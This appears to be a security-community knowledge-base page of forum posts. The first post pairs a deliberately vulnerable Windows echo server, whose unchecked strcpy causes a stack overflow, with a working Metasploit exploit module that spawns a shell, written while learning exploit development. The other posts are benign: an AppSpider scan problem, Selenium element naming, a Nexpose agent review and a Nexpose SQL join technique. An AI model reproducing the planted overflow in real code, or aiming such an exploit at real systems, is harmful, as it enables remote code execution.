Knowledge Base


Metasploit: Problems with Meterpreter payload [pschoenb]

I am in the process of learning the art of penetration testing and also how to work with Metasploit, including the development of new exploits. As a first test for exploit development, I wrote a little Windows server:

```c
/* server.cpp */
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>

/* Header files for Windows */
#include <winsock.h>
#include <io.h>

/* Port number */
#define PORT 1234
/* Buffers for incoming messages */
#define RCVBUFSIZE 8192
#define INBUFSIZE 2000

static void echo(SOCKET);
static void error_exit(char *errorMessage);
static void outputString(char* buffer, time_t zeit);

/* Output of the client information */
static void echo(SOCKET client_socket)
{
    char echo_buffer[RCVBUFSIZE];
    int recv_size;
    time_t zeit;

    if ((recv_size = recv(client_socket, echo_buffer, RCVBUFSIZE - 1, 0)) < 0)
        error_exit("Fehler bei recv()");
    // echo_buffer[recv_size] = '\0';
    time(&zeit);
    outputString(echo_buffer, zeit);
}

static void outputString(char* buffer, time_t zeit)
{
    char in_buffer[INBUFSIZE];
    /* The intended bug: unbounded copy of up to RCVBUFSIZE bytes into a 2000-byte buffer */
    strcpy(in_buffer, buffer);
    printf("Nachrichten vom Client : %s \t%s", in_buffer, ctime(&zeit));
}

/* Error output */
static void error_exit(char *error_message)
{
    fprintf(stderr, "%s: %d\n", error_message, WSAGetLastError());
    exit(EXIT_FAILURE);
}

int main(int argc, char *argv[])
{
    struct sockaddr_in server, client;
    SOCKET sock, fd;
    int len;

#ifdef _WIN32
    WORD wVersionRequested;
    WSADATA wsaData;
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0)
        error_exit("Fehler beim Initialisieren von Winsock");
    else
        printf("Winsock initialisiert\n");
#endif

    /* Create the socket. */
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET)   /* SOCKET is unsigned, so a "< 0" check would never fire */
        error_exit("Fehler beim Anlegen eines Sockets");

    /* Build the server's socket address. */
    memset(&server, 0, sizeof(server));
    /* IPv4 connection */
    server.sin_family = AF_INET;
    /* INADDR_ANY: accept any IP address */
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    /* Port number */
    server.sin_port = htons(PORT);

    /* Bind to a specific port. */
    if (bind(sock, (struct sockaddr*)&server, sizeof(server)) < 0)
        error_exit("Socket bind error\"binden\"");

    /* Accept connections */
    if (listen(sock, 5) == -1)
        error_exit("Fehler bei listen");

    /* Print everything that arrives */
    while (1) {
        len = sizeof(client);
        fd = accept(sock, (struct sockaddr*)&client, &len);
        printf("Server ready\n");
        if (fd == INVALID_SOCKET)
            error_exit("Fehler bei accept");
        printf("Bearbeite den Client mit der Adresse: %s\n", inet_ntoa(client.sin_addr));
        /* Screen output */
        echo(fd);
        /* Close the connection. */
        closesocket(fd);
    }
    return EXIT_SUCCESS;
}
```

My corresponding exploit looks like this:

```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # The names of the exploit module and the class are 'equal'
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Buffer Overflow in test server',
      'Description'    => %q{
        This module exploits a buffer overflow found in a special test server
        used to explore exploit writing.
      }, # End of Description
      'Author'         => 'Patrick Schoenbach', # Change this value with your (nick)name
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 1 $',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'           => 2000,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          # Target 0
          [ 'Windows 7',
            {
              'Platform' => 'win', # We exploit a Windows target
              'Ret'      => 0x0018D4DC
            }
          ],
        ],
      'DefaultTarget'  => 0
    )) # End of update_info() and super()

    register_options(
      [
        Opt::RPORT(1234)
      ], self.class)
  end # End of initialize

  def exploit
    connect
    print_status("Trying target #{target.name}...")

    nullSize = 4
    request  = payload.encoded
    request << make_nops(nullSize) # overwrite EBP
    request << [target.ret].pack('V')
    request << "\x00" * nullSize
    print_status("Total string length: #{request.length}")

    sock.puts(request)
    handler
    disconnect # We disconnect from the server
  end # End of exploit
end # End of class
```

When using a simple payload like "windows/shell_bind_tcp", the exploit works as expected. However, when using the payload "windows/meterpreter/bind_tcp", I get an access violation in the server, and I have no idea what actually goes wrong. Could someone enlighten me please what could be the problem? Sorry for posting so much code, but without the code, the problem would not be reproducible.

Posted by Edward Sheehy 2 years ago
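As an added example (not part of the post above and not the poster's code), a bounds-checked stand-in for the server's `outputString()` path: it copies at most `INBUFSIZE - 1` bytes of the buffer that `recv()` left unterminated, stops at an embedded NUL as `strcpy()` would, and rejects a failed or empty read, so an over-long message is truncated instead of overwriting the stack. The function names and the 3000-byte message are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define RCVBUFSIZE 8192   /* recv() buffer size from the posted server */
#define INBUFSIZE  2000   /* destination buffer that strcpy() overflowed */

/* Hardened stand-in for outputString(): recv() neither null-terminates
 * nor limits the message to INBUFSIZE, so copy a bounded number of bytes
 * and terminate the string ourselves.  recv_size is what recv() returned.
 * Returns the number of bytes stored, or -1 on a failed or empty read. */
int store_message(const char *echo_buffer, int recv_size, char *in_buffer)
{
    size_t n;
    const char *nul;
    if (echo_buffer == NULL || recv_size <= 0 || recv_size > RCVBUFSIZE - 1)
        return -1;
    n = (size_t)recv_size;
    /* An embedded NUL ends the string, as it would have for strcpy(). */
    nul = memchr(echo_buffer, '\0', n);
    if (nul != NULL)
        n = (size_t)(nul - echo_buffer);
    /* Truncate instead of writing past the end of in_buffer. */
    if (n > INBUFSIZE - 1)
        n = INBUFSIZE - 1;
    memcpy(in_buffer, echo_buffer, n);
    in_buffer[n] = '\0';
    return (int)n;
}

/* Constructed input: a 3000-byte message, larger than INBUFSIZE. */
int demo_overlong_message(void)
{
    static char echo_buffer[RCVBUFSIZE];
    static char in_buffer[INBUFSIZE];
    memset(echo_buffer, 'A', 3000);
    return store_message(echo_buffer, 3000, in_buffer);  /* 1999 */
}

int main(void)
{
    printf("kept %d of 3000 bytes\n", demo_overlong_message());
    return 0;
}
```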


AppSpider: Unable to Complete Scan due to Long Running Time [Amachi Lewis]

The Problem: So far, the scan takes several days to complete. During this time, if the PC is inactive for too long, it locks the PC. This causes the session with the AppSpider server to end, thus closing AppSpider itself and subsequently ending the scan prematurely.

Environment: We have an AppSpider Pro license. AppSpider is housed on a VM running Windows 2012 R2. I remote into this server using my own login and run the scan.

Actions tried: If I do this from my regular PC, my remote session ends after I lock my PC to leave my desk. If I do this from a special PC I have set up for this purpose, the same happens when the PC locks due to inactivity. If I disable the lock screen, it seems to be a viable workaround, but the PC is easily interfered with and lock screen countermeasures are not 100% reliable. Additionally, leaving myself logged into an unlocked PC, even if it is secured in a limited-access room, is undesirable. We run the scan as a Windows scheduled task; however, since we are Pro users and not Enterprise users, we don't have any monitoring access besides opening the AppSpider application itself. This leaves us with no choice but to sit and wait for an output to be created. However, whenever we decide to check on generated results, if nothing is there we won't know whether the scan has failed, is in a paused status, or is still running. The only option we haven't tried is building a physical machine capable of housing and running AppSpider that can be logged into directly.

So finally, my question to the AppSpider Pro community is: have any of you run into this kind of problem and, if so, how have you resolved it? If you have not had this difficulty, how does your configuration differ from mine? Any recommendations or suggestions would be greatly appreciated.

Posted by Stephanie Coyle 2 years ago


How to generate comprehensive Selenium variable name for complex HTML elements

I am trying to develop my own Selenium Page Object Generator. But I have encountered a problem where I have to generate meaningful names for web elements. I know I can do it like this for "normal" elements: grab the HTML element, get the ID or class and then use the extracted ID to make it into a normal variable name. For example:

```html
<input type="text" name="username" size="10">
```

Here I can extract the "name" attribute and generate the variable name userName. But let's say that there are more complex HTML elements now (a link, for example). For example: open Google and type: selenium features and limitations. When I inspect the first link, it looks horrible and complex:

```html
<a href="/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=1&amp;cad=rja&amp;uact=8&amp;ved=0ahUKEwiZi6z3i6PWAhWnKJoKHVUVBM8QFggkMAA&amp;;usg=AFQjCNEFZcVJn3i-IJijiF8WqyCh86K-_A" onmousedown="return rwt(this,'','','','1','AFQjCNEFZcVJn3i-IJijiF8WqyCh86K-_A','','0ahUKEwiZi6z3i6PWAhWnKJoKHVUVBM8QFggkMAA','','',event)" data-href="">What are the Advantages and Disadvantages of Selenium ? - Software ...</a>
```

Exactly how am I supposed to generate a comprehensive page object variable name from that? Is there some sort of algorithm?

Posted by soujanya 2 years ago
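As an added illustration (not the poster's code), one mechanical way to derive a name from an element: try `id`, then `name`, then the visible text in that order, keep only letters and digits, camelCase them, cut long link text to its first four words, and append a suffix for the tag so the element's role stays visible. The function names, the four-word limit and the suffix table are choices made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_WORDS 4  /* long link text is cut to its first few words */
/* camelCase the letters and digits of src; any other byte separates words and
 * leading digits are dropped.  Returns the length written, 0 if nothing usable. */
size_t to_camel_case(const char *src, char *out, size_t cap)
{
    const unsigned char *p = (const unsigned char *)src;
    size_t n = 0, words = 1;
    int in_word = 0, seen_word = 0;
    if (src == NULL || cap < 2) return 0;
    for (; *p != '\0' && n + 1 < cap; p++) {
        if (!isalnum(*p)) { in_word = 0; continue; }
        if (n == 0 && isdigit(*p)) continue;
        if (!in_word && seen_word && ++words > MAX_WORDS) break;
        out[n++] = (char)((!in_word && seen_word) ? toupper(*p) : tolower(*p));
        in_word = seen_word = 1;
    }
    out[n] = '\0';
    return n;
}

/* Take the first usable source in priority order (id, name, visible text),
 * camel-case it and append a suffix for the tag.  Returns 0, or -1 if nothing was usable. */
int generate_variable_name(const char *tag, const char *id, const char *name,
                           const char *text, char *out, size_t cap)
{
    static const char *suffix[][2] = { {"a", "Link"}, {"input", "Input"},
                                       {"button", "Button"}, {"select", "Select"} };
    const char *sources[3] = { id, name, text };
    size_t i, n = 0;
    for (i = 0; i < 3 && n == 0; i++)
        n = to_camel_case(sources[i], out, cap);
    if (n == 0) return -1;
    for (i = 0; i < sizeof suffix / sizeof suffix[0]; i++)
        if (strcmp(tag, suffix[i][0]) == 0 && n + strlen(suffix[i][1]) < cap)
            strcat(out, suffix[i][1]);
    return 0;
}

int main(void)
{
    char buf[64];
    generate_variable_name("a", NULL, NULL, "What are the Advantages and "
        "Disadvantages of Selenium ? - Software ...", buf, sizeof buf);
    printf("%s\n", buf);  /* whatAreTheAdvantagesLink */
    return 0;
}
```

Note that `name="username"` comes out as `usernameInput` here: splitting a single token into `userName` would need a word list, which the post does not describe.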


Nexpose: Nexpose Agent Review [Matthew Prouse]

So I recently installed the agent on a system and gave it a go. I know it is Beta... but I wanted to address the items I saw in case they aren't being addressed... Please add your own experience or feedback to help me and others get better acquainted...

1) I like the idea that this is for mobile systems like laptops that can check in from outside... What I need is a way to use this agent on systems internally that are "off limits" to scanning for one reason or another and ensure the data is not traversing the "cloud" but proxying directly to the on-prem console. I can already see this will not get approved by my Risk team without a full-blown evaluation of how the data traverses.

2) The data is already an internal credential scan, and the external agent data is not even close to matching: vulnerabilities, software installed, users, groups, etc. This will cause all kinds of confusion around remediation and compliance if we applied this to other systems.

3) I have multiple security consoles in my environment... I see it matters which Nexpose Now dashboard I pull the install package from, to build its relationship with that agent's cert. No big deal, I just thought this would be configurable to point an agent at a particular Console/Nexpose Now dashboard.

4) Also, just looking at my basic system build, the agent is the 4th largest consumer of memory. As we add other applications and move this to production I will look to see if that impacts our final builds.

I am sure I will have more but for now this is my initial feedback.

Posted by Edward Sheehy 2 years ago


Nexpose: SQL Query Export: Convenient Technique to Join Site Name to Assets [jaldridge]

One idiom that I've been having to use over and over again involves showing assets with their site names. But this involves joining three tables, and I'd like to share a notational technique to make this more manageable. Note that I've been meaning to post a rant that the intermediate table, `dim_site_asset`, did not need to be a part of the design (as such tables are usually only justified when there is a many-to-many relationship, which this is not). However, as much time as I've been pondering the issue, I've found a notational convenience that alleviates some of my frustration.

Having learned my early SQL skills on old systems and primitive embedded systems, I have been conditioned over the years to do everything the hard way, with lots of repeated/redundant SQL code. And since it's become apparent that modern SQL has cured much of that old coding malaise, I've been putting myself through a crash course to make the most of modern SQL features permitted through the NeXpose reporting interface. So, if you're new to SQL or if you're suffering from lots of ancient SQL habits, you might find this useful and time saving.

The key to the trick is in how `SELECT *` works in a join. The following simply adds the column `site_id` to the table `dim_asset`:

```sql
SELECT *
FROM dim_asset
JOIN dim_site_asset USING (asset_id)
```

This can then be used and re-used as a defined sub-query in the `WITH` block. Add to this a narrowed definition of the table `dim_site`, and you can use the same trick again to add in only the site name.

```sql
WITH dim_asset_site AS (
    SELECT *
    FROM dim_asset
    JOIN dim_site_asset USING (asset_id)
),
dim_site_name AS (
    SELECT site_id, name AS site_name
    FROM dim_site
)
SELECT *
FROM dim_asset_site
JOIN dim_site_name USING (site_id)
```

To go ahead and make the whole thing reusable:

```sql
WITH dim_asset_site AS (
    SELECT *
    FROM dim_asset
    JOIN dim_site_asset USING (asset_id)
),
dim_site_name AS (
    SELECT site_id, name AS site_name
    FROM dim_site
),
dim_asset_site_name AS (
    SELECT *
    FROM dim_asset_site
    JOIN dim_site_name USING (site_id)
)
SELECT *
FROM dim_asset_site_name
```

For the number of times that I've joined site names to assets, this is certainly a technique I would like to have known about from the start, but I'm very happy to have learned that modern SQL has eliminated some of the nonsense that had existed way back in ancient history.


Posted by Edward Sheehy 2 years ago